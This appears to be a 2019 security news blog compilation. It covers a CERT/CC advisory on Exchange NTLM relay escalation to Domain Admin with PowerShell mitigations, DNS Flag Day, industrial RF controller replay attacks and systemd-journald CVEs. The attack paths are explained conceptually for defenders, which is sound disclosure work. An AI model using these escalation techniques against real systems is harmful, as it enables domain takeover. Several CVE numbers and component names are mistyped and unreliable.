The scanner can inspect any files that Windows can index, by using IFilters that are installed on the computer. Then, to determine if the files need labeling, the scanner uses the Office 365 built-in data loss prevention (DLP) sensitivity information types and pattern detection, or Office 365 regex patterns. Because the scanner uses the Azure Information Protection client, it can classify and protect the same file types.

You can run the scanner in discovery mode only, where you use the reports to check what would happen if the files were labeled. Or, you can run the scanner to automatically apply the labels. You can also run the scanner to discover files that contain sensitive information types, without configuring labels for conditions that apply automatic classification.

Note that the scanner does not discover and label in real time. It systematically crawls through files on data stores that you specify, and you can configure this cycle to run once, or repeatedly.

You can specify which file types to scan, or exclude from scanning. To restrict which files the scanner inspects, define a file types list by using Set-AIPScannerScannedFileTypes.

To learn more go Here

CERT/CC Reports Microsoft Exchange 2013 and Newer are Vulnerable to NTLM Relay Attacks

Original release date: January 28, 2019

The CERT Coordination Center (CERT/CC) has released information to address NTLM relay attacks affecting Microsoft Exchange 2013 and newer versions. A remote attacker could exploit this vulnerability to take control of an affected system.

Microsoft Exchange 2013 and newer fail to set signing and sealing flags on NTLM authentication traffic, which can allow a remote attacker to gain the privileges of the Exchange server.

Microsoft Exchange supports a API called Exchange Web Services (EWS). One of the EWS API functions is called PushSubscription, which can be used to cause the Exchange server to connect to an arbitrary website. Connections made using the PushSubscription feature will attempt to negotiate with the arbitrary web server using NTLM authentication. Starting with Microsoft Exchange 2013, the NTLM authentication over HTTP fails to set the NTLM Sign and Seal flags. The lack of signing makes this authentication attempt vulnerable to NTLM relay attacks.
Microsoft Exchange is by default configured with extensive privileges with respect to the Domain object in Active Directory. Because the Exchange Windows Permissions group has WriteDacl access to the Domain object, this means that the Exchange server privileges obtained using this vulnerability can be used to gain Domain Admin privileges for the domain that contains the vulnerable Exchange server.


An attacker that has credentials for an Exchange mailbox and also has the ability to communicate with both a Microsoft Exchange server and a Windows domain controller may be able to gain domain administrator privileges. It is also reported that an attacker without knowledge of an Exchange user's password may be able to perform the same attack by using an SMB to HTTP relay attack as long as they are in the same network segment as the Exchange server.


The CERT/CC is currently unaware of a practical solution to this problem. Please consider the following workarounds:

Disable EWS push/pull subscriptions

If you have an exchange server that does not leverage EWS push/pull subscriptions, you can block the PushSubscription API call that triggers this attack. In an Exchange Management Shell window, execute the following commands:
    New-ThrottlingPolicy -Name NoEWSSubscription -ThrottlingPolicyScope Organization -EwsMaxSubscriptions 0
    Restart-WebAppPool -Name MSExchangeServicesAppPool

Remove privileges that Exchange has on the domain object

Please note that the following workaround was not developed by CERT and is not supported by Microsoft. Please test any workarounds in your environment to ensure that they work properly. is a PowerShell script that can be executed on either the Exchange Server or Domain Controller system. By default this script will check for vulnerable access control entries in the current active directory. When executed with Domain Admin privileges and the -Fix flag, this script will remove the ability for Exchange to write to the domain object.

Note that if you encounter an error about Get-ADDomainController not being recognized, you will need to install and import the ActiveDirectory PowerShell module, and then finally run Fix-DomainObjectDACL.ps1 :
    Import-Module ServerManager
    Add-WindowsFeature RSAT-AD-PowerShell
    Import-Module ActiveDirectory

If the script reports that faulty ACE were found, run:
    .\Fix-DomainObjectDACL.ps1 -Fix

PowerShell may be configured to block the execution of user-provided .ps1 files. If this is the case, first find your current PowerShell execution policy:
Temporarily allow the execution of the Fix-DomainObjectDACL.ps1 script by running:
    Set-ExecutionPolicy unrestricted
Once you are finished running the Fix-DomainObjectDACL.ps1script, set the policy back to the original value as reported by Get-ExecutionPolicy:
    Set-ExecutionPolicy [POLICY]
    The National Cybersecurity and Communications Integration Center (NCCIC), part of the Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review CERT/CC’s Vulnerability Note VU#465632 and consider the listed workarounds until patches are made available.

Saturday, January 26, 2019

Important Alert DNS Flag Day February 1, 2019 – Ensure Your Institution is Prepared

    On Friday, February 1, major DNS (Domain Name System) software and public DNS providers will remove support for workarounds accommodating authoritative DNS servers that don’t follow published operational standards1. Most EDU sites will not be affected; however, institutions using authoritative servers that don’t meet standards may find their IT-based resources unreachable by large portions of the Internet.
    How to Determine if You’re Affected  • Make a list of all the domains your institution owns. • Test the domains using tools at DNS Flag Day site2 or ISC EDNS Compliance Tester3. Note that all domains hosted at a given server will either pass or fail.
How to Fix an Apparent Non-Compliant Server
  • For domain names served by a third-party, contact the responsible party immediately.
  • Make sure the failure isn’t a false report due to your authoritative server rate limiting the test tool.
  • Make sure firewalls are not blocking EDNS traffic. Allow UDP packets greater than 512 bytes and see the firewall discussion on the DNS Flag Day site2.
  • Update your authoritative DNS server software. 
    The “resolver”, or client side of DNS, initiates a sequence of queries ultimately leading to an "authoritative DNS server" that can answer a requested mapping (e.g. = The client resolver on your device is supported in the sequence-of-queries by a "recursive resolver", usually provided by the institution or Internet Service Provider. Most recursive resolvers now support EDNS (Extension Mechanisms for DNS). Absence of EDNS support in authoritative DNS servers requires workarounds by the recursive resolver. DNS Flag Day removes support for these workarounds.
     Even if an institution doesn't upgrade its own recursive resolvers to a version that removes support for the workarounds, because others in the world will be upgrading their recursive resolvers, access to the institution’s IT-based resources will be affected by the institution’s non-compliant authoritative DNS server.
     This post was provided by The Research and Education Networking Information Sharing and Analysis Center (REN-ISAC). 
    To see how this might affect our members, REN-ISAC quickly inspected 53 institutions residing within one U.S. state, we found that 30 showed no problem, 15 showed minor problems, and six showed serious problems. Two tested schools returned with a result of “Fatal Error Detected”.
The following sites provide more information on how your organization can prepare:
2 DNS Flag Day;
3 ISC EDNS Compliance Tester;
Additional information can be found here

Wednesday, January 23, 2019

Manufacturing RF Vulnerabilities

      Radio-frequency (RF) remote controllers are everywhere: they open your car and your garage, they connect peripherals to your computer. You will also find them widely used in manufacturing and construction. Being able to remotely control large and/or multiple pieces of equipment from one device offers convenience and increased productivity, but remote solutions are often implemented with security as an afterthought, if thought of at all.
      We’ve seen how trivial it is to hack a key fob or a wireless keyboard, and it's not much more difficult to hack a controller for large machinery. This week, Trend Micro released a report on how pervasive and vulnerable RF controllers are in the industrial world and they found that garage door openers are more secure than industrial RF controllers. Potential attack vectors might be as simple as a replay attack, where the attacker sniffs the RF packets and sends them back to the machine to gain control—something any script kiddie could do. From there the attacker could modify packets to inject commands.
     Another relatively simple attack is called e-stop abuse, where the emergency stop command is replayed to the machine until it causes a denial-of-service (DoS). This could bring an entire factory to a grinding halt or disrupt safety mechanisms, putting workers in danger.
On the other end of the spectrum is a more difficult and more remote attack vector. An advanced hacker could remotely rewrite the firmware on a remote control with their own malicious code in order to gain and maintain access. This impacts all of the vendors tested by Trend Micro that support reprogramming on their devices. Researchers also noted that none of those devices had authentication implemented.
    The vulnerabilities discovered have been reported to the manufacturers in the hopes that those companies will take a closer look at the security of their devices. It remains to be seen whether any changes will be made. Physical security is usually very good at manufacturing and construction sites, possibly thwarting a local attack, but it's never one hundred percent. A determined hacker will find a way and industry provides a large attack surface with many possibilities. 
Sources: even_cranes_are_hackable_trend_micro/

Flaws in Systemd Privilege Escalation in almost all of the systemd based Linux distros

     Researchers at Qualys have revealed three security vulnerabilities in a component of systemd. This is believed to be affecting almost all of the systemd based Linux distros. The silver lining is that most of the distros have been made aware of the issue and have been working on fixes for these exploits.
     The patches are respectively CVE-2018-16864, CVE-2018-16865, and CVE-201819866. They should be appearing in repos soon. This has been attributed to coordinated disclosure by Qualys. Debian will remain vulnerable for the time being, however, according to The Register, Qualys’s Jimmy Graham has said “that they are aware of the issue and we should be seeing a fix soon.”
     The bugs were found in system-journald, a component of system that handles the collection and storage of logs. The first two, CVE-2018-16864 and CVE-201816865, are memory corruption flaws. CVE-2018-16864 can be leveraged by malware to crash and potentially hijack the system-journald service, there-by elevating access from a user to root for the attacker. CVE-2018-16865 and CVE2018-16866 can be used together to crash or hijack a root privileged journal service by a local attacker.
     These exploits are believed to affect almost all of the systemd based Linux distros in use today. However, SUSE Linux Enterprise, openSUSE Leap 15.0, and Fedora 28 & 29 do not seem to be affected. This is thought to be due to their user-land code being compiled with GCC’s –fstack-clash-protection.
      CVE-2018-16864 entered into the code base in April of 2013, then became exploitable with system v203 in Feb 2016. CVE-2018-16865 seems to have appeared in the code base in 2011 in system v38 and became exploitable in April 2013 (systremd v 201). CVE-2018-16866 was introduced in June of 2015. However, it was inadvertently fixed in August of 2018.